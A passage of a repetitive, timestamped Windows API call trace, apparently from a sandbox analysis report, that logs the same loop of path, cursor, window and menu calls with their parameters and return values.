pszDest=0x0) returned 0x0 [0027.365] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.365] PathFileExistsW (pszPath=0x0) returned 0 [0027.365] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.365] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.365] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.365] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.365] GetMenu (hWnd=0x0) returned 0x0 [0027.365] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.366] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.366] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.367] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.367] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.367] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.367] GetStockObject (i=6) returned 0x1b00018 [0027.367] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.367] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.367] PathFileExistsW (pszPath=0x0) returned 0 [0027.367] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.367] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.367] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.367] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.367] GetMenu (hWnd=0x0) returned 0x0 [0027.367] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.367] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.367] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.367] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.367] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.367] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.367] GetStockObject (i=6) returned 0x1b00018 [0027.367] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.367] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.367] PathFileExistsW (pszPath=0x0) returned 0 [0027.367] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.367] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.367] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.367] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.368] GetMenu (hWnd=0x0) returned 0x0 [0027.368] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.368] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.368] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.368] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.368] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.368] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.368] GetStockObject (i=6) returned 0x1b00018 [0027.368] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.368] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.368] PathFileExistsW (pszPath=0x0) returned 0 [0027.368] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.368] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.368] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.368] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.368] GetMenu (hWnd=0x0) returned 0x0 [0027.368] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.368] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.368] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.368] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.368] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.368] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.368] GetStockObject (i=6) returned 0x1b00018 [0027.368] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.368] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.368] PathFileExistsW (pszPath=0x0) returned 0 [0027.368] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.369] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.369] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.369] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.369] GetMenu (hWnd=0x0) returned 0x0 [0027.369] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x12f) returned -1 [0027.369] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.369] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.369] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.369] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.369] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.369] GetStockObject (i=6) returned 0x1b00018 [0027.369] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.369] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.369] PathFileExistsW (pszPath=0x0) returned 0 [0027.369] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.369] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.369] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.369] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.369] GetMenu (hWnd=0x0) returned 0x0 [0027.369] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.369] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.369] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.369] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.369] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.369] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.369] GetStockObject (i=6) returned 0x1b00018 [0027.370] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.370] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.370] PathFileExistsW (pszPath=0x0) returned 0 [0027.370] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.370] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.370] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.370] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.370] GetMenu (hWnd=0x0) returned 0x0 [0027.370] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.370] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.370] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.370] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.370] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.370] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.370] GetStockObject (i=6) returned 0x1b00018 [0027.370] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.370] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.370] PathFileExistsW (pszPath=0x0) returned 0 [0027.370] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.370] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.370] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.370] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.370] GetMenu (hWnd=0x0) returned 0x0 [0027.370] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.370] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.370] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.370] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.371] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.371] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.371] GetStockObject (i=6) returned 0x1b00018 [0027.371] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.371] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.371] PathFileExistsW (pszPath=0x0) returned 0 [0027.371] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.371] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.371] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.371] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.371] GetMenu (hWnd=0x0) returned 0x0 [0027.371] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.371] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.371] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.371] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.372] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.372] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.372] GetStockObject (i=6) returned 0x1b00018 [0027.372] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.372] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.372] PathFileExistsW (pszPath=0x0) returned 0 [0027.372] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.372] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.372] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.372] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.372] GetMenu (hWnd=0x0) returned 0x0 [0027.372] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4a3) returned -1 [0027.372] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.372] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.372] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.372] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.372] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.372] GetStockObject (i=6) returned 0x1b00018 [0027.372] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.372] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.372] PathFileExistsW (pszPath=0x0) returned 0 [0027.372] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.372] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.372] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.372] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.372] GetMenu (hWnd=0x0) returned 0x0 [0027.372] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.373] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.373] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.373] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.373] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.373] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.373] GetStockObject (i=6) returned 0x1b00018 [0027.373] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.373] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.373] PathFileExistsW (pszPath=0x0) returned 0 [0027.373] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.373] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.373] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.373] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.373] GetMenu (hWnd=0x0) returned 0x0 [0027.373] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.373] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.373] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.373] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.373] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.373] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.373] GetStockObject (i=6) returned 0x1b00018 [0027.373] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.373] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.373] PathFileExistsW (pszPath=0x0) returned 0 [0027.373] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.373] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.374] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.374] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.374] GetMenu (hWnd=0x0) returned 0x0 [0027.374] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.374] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.374] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.374] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.374] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.374] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.374] GetStockObject (i=6) returned 0x1b00018 [0027.374] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.374] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.374] PathFileExistsW (pszPath=0x0) returned 0 [0027.374] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.374] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.374] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.374] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.374] GetMenu (hWnd=0x0) returned 0x0 [0027.374] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.374] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.374] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.374] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.374] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.374] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.374] GetStockObject (i=6) returned 0x1b00018 [0027.374] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.375] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.375] PathFileExistsW (pszPath=0x0) returned 0 [0027.375] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.375] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.375] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.375] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.375] GetMenu (hWnd=0x0) returned 0x0 [0027.375] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x143) returned -1 [0027.375] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.375] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.375] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.375] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.375] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.375] GetStockObject (i=6) returned 0x1b00018 [0027.375] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.375] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.375] PathFileExistsW (pszPath=0x0) returned 0 [0027.375] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.375] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.375] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.375] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.375] GetMenu (hWnd=0x0) returned 0x0 [0027.375] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.375] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.375] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.375] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.375] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.376] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.376] GetStockObject (i=6) returned 0x1b00018 [0027.376] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.376] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.376] PathFileExistsW (pszPath=0x0) returned 0 [0027.376] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.376] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.376] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.376] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.376] GetMenu (hWnd=0x0) returned 0x0 [0027.376] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.376] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.376] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.376] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.376] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.376] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.376] GetStockObject (i=6) returned 0x1b00018 [0027.376] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.376] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.376] PathFileExistsW (pszPath=0x0) returned 0 [0027.376] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.376] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.376] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.376] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.376] GetMenu (hWnd=0x0) returned 0x0 [0027.376] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.377] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.377] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.377] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.377] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.377] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.377] GetStockObject (i=6) returned 0x1b00018 [0027.377] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.377] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.377] PathFileExistsW (pszPath=0x0) returned 0 [0027.377] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.377] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.377] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.377] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.377] GetMenu (hWnd=0x0) returned 0x0 [0027.377] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.377] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.377] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.377] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.377] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.377] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.377] GetStockObject (i=6) returned 0x1b00018 [0027.377] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.377] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.377] PathFileExistsW (pszPath=0x0) returned 0 [0027.377] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.377] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.378] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.378] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.378] GetMenu (hWnd=0x0) returned 0x0 [0027.378] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x366) returned -1 [0027.378] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.378] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.378] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.378] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 